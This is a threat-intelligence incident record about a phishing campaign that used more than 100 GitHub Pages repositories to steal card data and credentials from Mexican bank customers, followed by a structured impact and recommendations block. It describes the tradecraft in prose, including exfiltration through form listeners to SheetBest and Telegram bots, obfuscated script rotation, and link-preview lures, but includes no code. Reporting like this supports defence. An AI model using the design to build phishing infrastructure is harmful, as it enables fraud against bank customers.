Sophisticated Phishing Campaign Exploits GitHub Pages to Target Mexican Banking Customers
A long-running phishing operation has evolved into a serverless, modular campaign leveraging GitHub Pages to steal payment card data, credentials, and customer identifiers from banking users in Mexico. The attack employs a phishing kit with a selector panel, allowing operators to generate institution-specific landing pages impersonating at least a dozen financial institutions. These pages support both desktop and mobile interfaces to maximize victim engagement.
Instead of relying on a single domain, attackers deployed the kit across over 100 GitHub Pages repositories, using varied directory paths (e.g., /cancelacion/, /soporte/, /mb1/) to enhance redundancy, evade takedowns, and enable rapid redeployment. Group-IB researchers attribute the campaign’s persistence and scale to a reusable phishing kit combining GitHub Pages hosting, obfuscated client-side scripts, and third-party APIs particularly SheetBest for data exfiltration.
The attack follows a multi-stage flow: victims are lured to impersonation pages designed to build trust before being redirected to credential-harvesting forms mimicking legitimate banking logins. JavaScript submit listeners intercept form submissions, serialize data into JSON, and POST it to SheetBest API endpoints, which populate attacker-controlled Google Sheets in real time. This serverless approach eliminates the need for traditional command-and-control infrastructure.
To evade detection, phishing pages load obfuscated external JavaScript via randomized paths, allowing payload rotation without altering the visible page. Some instances also used hardcoded Telegram bot tokens and chat IDs to forward stolen credentials instantly, demonstrating operational flexibility. Repository metadata and commit histories reveal active maintenance by multiple operator accounts over more than a year, with continuous updates, template revisions, and endpoint rotations.
The campaign leveraged Jekyll-based GitHub Pages builds and GitHub Actions for automation, while Open Graph metadata ensured convincing link previews for messaging apps. A robots noindex,nofollow directive confirmed the pages were not intended for organic search but for targeted distribution via SMS, WhatsApp, Telegram, or social media where link previews significantly boost click-through rates.
This operation highlights a growing trend: threat actors abuse trusted cloud platforms, HTTPS, and deployment ease to conduct resilient phishing at scale. By exploiting services like GitHub Pages and SheetBest, attackers minimize infrastructure exposure and complicate attribution and takedown efforts. Group-IB identified numerous GitHub Pages repositories and SheetBest endpoints tied to the campaign, all resolving to a shared backend IP, reinforcing a centralized, serverless exfiltration model.
Source: https://gbhackers.com/modular-phishing-kit-uses-github-pages/
GitHub cybersecurity rating report: https://www.rankiteo.com/company/github
"id": "GIT1781706579",
"linkid": "github",
"type": "Cyber Attack",
"date": "3/2024",
"severity": "85",
"impact": "4",
"explanation": "Attack with significant impact with customers data leaks"{'affected_entities': [{'industry': 'Banking',
'location': 'Mexico',
'type': 'Financial Institutions'}],
'attack_vector': 'GitHub Pages, SMS, WhatsApp, Telegram, Social Media',
'data_breach': {'data_exfiltration': 'Yes (via SheetBest API to Google '
'Sheets, Telegram bots)',
'personally_identifiable_information': 'Yes',
'sensitivity_of_data': 'High',
'type_of_data_compromised': ['Payment card data',
'Credentials',
'Customer identifiers']},
'description': 'A long-running phishing operation has evolved into a '
'serverless, modular campaign leveraging GitHub Pages to steal '
'payment card data, credentials, and customer identifiers from '
'banking users in Mexico. The attack employs a phishing kit '
'with a selector panel, allowing operators to generate '
'institution-specific landing pages impersonating at least a '
'dozen financial institutions. These pages support both '
'desktop and mobile interfaces to maximize victim engagement. '
'The campaign leveraged Jekyll-based GitHub Pages builds and '
'GitHub Actions for automation, while Open Graph metadata '
'ensured convincing link previews for messaging apps. The '
'attack follows a multi-stage flow: victims are lured to '
'impersonation pages designed to build trust before being '
'redirected to credential-harvesting forms mimicking '
'legitimate banking logins. JavaScript submit listeners '
'intercept form submissions, serialize data into JSON, and '
'POST it to SheetBest API endpoints, which populate '
'attacker-controlled Google Sheets in real time.',
'impact': {'brand_reputation_impact': 'Likely significant for impersonated '
'banks',
'data_compromised': 'Payment card data, credentials, customer '
'identifiers',
'identity_theft_risk': 'High',
'payment_information_risk': 'High'},
'investigation_status': 'Ongoing (Group-IB identified repositories and '
'endpoints)',
'lessons_learned': 'Threat actors are increasingly abusing trusted cloud '
'platforms and serverless architectures to conduct '
'resilient phishing campaigns at scale. The use of GitHub '
'Pages, SheetBest, and Telegram for data exfiltration '
'minimizes infrastructure exposure and complicates '
'takedown efforts.',
'motivation': 'Financial gain, credential theft, payment card data theft',
'post_incident_analysis': {'corrective_actions': 'Enhanced monitoring of '
'cloud platforms, customer '
'education, improved '
'phishing detection '
'mechanisms',
'root_causes': 'Abuse of GitHub Pages and '
'SheetBest for serverless phishing, '
'lack of customer awareness, '
'insufficient detection of '
'impersonation pages'},
'recommendations': ['Implement multi-factor authentication for all banking '
'logins',
'Monitor and block suspicious GitHub Pages domains',
'Educate customers on identifying phishing attempts',
'Enhance detection of credential-harvesting forms and '
'data exfiltration to third-party APIs',
'Collaborate with cloud service providers to detect and '
'takedown malicious repositories'],
'references': [{'source': 'Group-IB'}],
'response': {'third_party_assistance': 'Group-IB researchers'},
'title': 'Sophisticated Phishing Campaign Exploits GitHub Pages to Target '
'Mexican Banking Customers',
'type': 'Phishing',
'vulnerability_exploited': 'Abuse of trusted cloud platforms (GitHub Pages, '
'SheetBest), lack of multi-factor authentication, '
'social engineering'}